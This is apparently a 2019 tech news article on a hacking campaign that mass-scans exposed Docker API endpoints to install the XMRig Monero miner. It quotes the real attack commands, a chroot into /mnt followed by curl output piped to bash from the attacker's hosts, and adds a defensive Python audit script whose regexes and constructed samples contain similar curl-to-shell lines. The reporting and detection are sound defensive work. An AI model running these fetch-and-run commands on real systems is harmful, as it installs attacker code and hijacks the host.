
Hackers mass-scan for Docker vulnerability to mine Monero cryptocurrency


Its size is what caught the attention of researchers

A hacking group is reportedly performing a mass-scan of the internet in search of vulnerable ports on systems using enterprise sandbox software Docker to mine cryptocurrency.

According to security researchers at Bad Packets, the scans, which began over the weekend, identify vulnerabilities that allow bad actors to inject malicious code that deploys a cryptocurrency miner on a company’s Docker instances, ZDNet reports.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'", #threatintel

— Bad Packets Report (@bad_packets) November 25, 2019

Troy Mursch, chief researcher and co-founder of Bad Packets, told ZDNet this type of activity is quite common. However, this campaign was unique because of its size.

Researchers are yet to get to grips with the entire scope of the campaign. However, as it stands, the attack is scanning over 59,000 IP networks looking for vulnerable Docker instances.

When an exposed instance is found, the following command is run.

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'

This downloads a further script from the attacker’s server which then installs a cryptocurrency mining bot, Monero miner XMRig.
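Defenders can look for the same pattern in the Docker daemon's own container list. The following Python is an added example, not code from Bad Packets or TNW: it audits entries shaped like the Docker Engine API's GET /containers/json response (the source of the "Command" field quoted above) for a download piped into a shell and a chroot into a bind mount of the host's root. The sample entries and the placeholder URLs are constructed, and the host root being mounted at /mnt is an assumption the article does not state.

```python
import re

# Download piped straight into a shell, e.g. "curl ... | bash" or "wget ... | sh".
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|da|z)?sh\b")
# Assumption (not stated on the page): the host's / is bind-mounted at the chroot target.
CHROOT = re.compile(r"\bchroot\s+(/\S*)")

def audit_container(c):
    """Return the reasons one container-list entry looks like this campaign's."""
    cmd = c.get("Command", "")
    reasons = []
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("download piped to shell")
    m = CHROOT.search(cmd)
    if m:
        target = m.group(1).rstrip("/") or "/"
        for mount in c.get("Mounts", []):
            dest = mount.get("Destination", "").rstrip("/") or "/"
            if mount.get("Type") == "bind" and mount.get("Source") == "/" and dest == target:
                reasons.append(f"chroot into host root mounted at {dest}")
    return reasons

def audit(containers):
    """Map short container id -> reasons, for every flagged container."""
    out = {}
    for c in containers:
        reasons = audit_container(c)
        if reasons:
            out[c.get("Id", "?")[:12]] = reasons
    return out

# Constructed sample in the shape of a GET /containers/json?all=1 response.
SAMPLE = [
    {"Id": "a1" * 32, "Image": "alpine",
     "Command": "chroot /mnt /bin/sh -c 'curl -sL4 http://payload.example/x | bash;'",
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}]},
    {"Id": "b2" * 32, "Image": "nginx:1.17",
     "Command": "nginx -g 'daemon off;'",
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
                 "Destination": "/usr/share/nginx/html"}]},
    {"Id": "c3" * 32, "Image": "alpine",
     "Command": "/bin/sh -c 'curl -s http://mirror.example/setup.sh | sh'",
     "Mounts": []},
]

if __name__ == "__main__":
    for cid, reasons in audit(SAMPLE).items():
        print(cid, "; ".join(reasons))
```

An entry that matches both checks, like the first constructed one, is the stronger signal; a pipe-to-shell on its own also appears in ordinary setup scripts and needs a second look rather than an automatic alert.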

In the few days since hackers started scanning for exposed Docker instances, more than 14.8 Monero has been mined, about $740 worth, Mursch added.

If you’re not into enterprise software you might not know what Docker is, but one of TNW’s devs explained it to me as a “virtual container” in which you can run other virtual machines.

Docker itself isn’t a virtual machine, though; it’s a sandbox environment and does need some resources from the host machine to run properly.

It lets devs package applications and run them in virtual environments.

You can read this explainer for more information.

Published November 27, 2019 — 13:47 UTC
